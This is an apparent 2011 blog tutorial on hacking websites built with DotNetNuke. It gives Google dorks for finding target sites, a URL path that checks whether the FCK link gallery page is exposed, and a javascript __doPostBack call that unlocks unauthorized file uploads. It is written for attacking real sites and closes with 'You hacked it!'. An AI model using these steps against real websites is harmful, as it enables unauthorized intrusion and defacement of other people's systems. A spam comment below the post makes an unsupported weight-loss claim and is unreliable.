Friday, June 3, 2011

DNN (DotNetNuke) Hacking

Hacking Websites With DotNetNuke

Introduction
Today you will learn about a new web hacking technique known as DNN (standing for DotNetNuke). DNN is a new and growing form of hacking, that has recently become well known and popular. Its easy compared to hacking sites using SQLI, XSS, RFI etc.

In this lesson you will learn how to find your target, enter the website, and upload your files.

DotNetNuke is an open source platform for developing websites using Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.


Step 1: Google Dork
The first step is very easy. We simply use a Google Dork to find a target.
Two dorks are:
Code:
inurl:”/portals/0″ site:.com
inurl:/tabid/36/language/en-US/Default.aspx
(I'm assuming you already know how to use Google Dorks - if not, there is a guide here)
You can change the domain (.com) to something else, if you'd prefer.

Step 2: Check for the Vulnerability
Place the following after the web URL/address:
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For example, if you found a target site called targetsite.com you would have:
Code:
www.targetsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You should get a page something like this:


If you do, it means the site is vulnerable.

Step 3: Hacking the Site
Choose the third option (A File On Your Site) and then paste in the following JavaScript code to your address bar.
Code:
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
You will then be allowed to upload files on this website, you can upload txt, swf, jpg, gif, pdf files.

After uploading the files you're file will be found at domain/portals/0/yourfile.extension
Or in our case (if we uploaded a text file called "hax.txt"):
Code:
www.targetsite.com/portals/0/hax.txt
Congratulations! You hacked it!

1 comment:

  1. As reported by Stanford Medical, It's indeed the SINGLE reason women in this country live 10 years more and weigh on average 42 pounds lighter than us.

    (And actually, it really has NOTHING to do with genetics or some secret-exercise and really, EVERYTHING related to "HOW" they eat.)

    P.S, What I said is "HOW", and not "WHAT"...

    Tap on this link to determine if this little test can help you decipher your true weight loss possibility

    ReplyDelete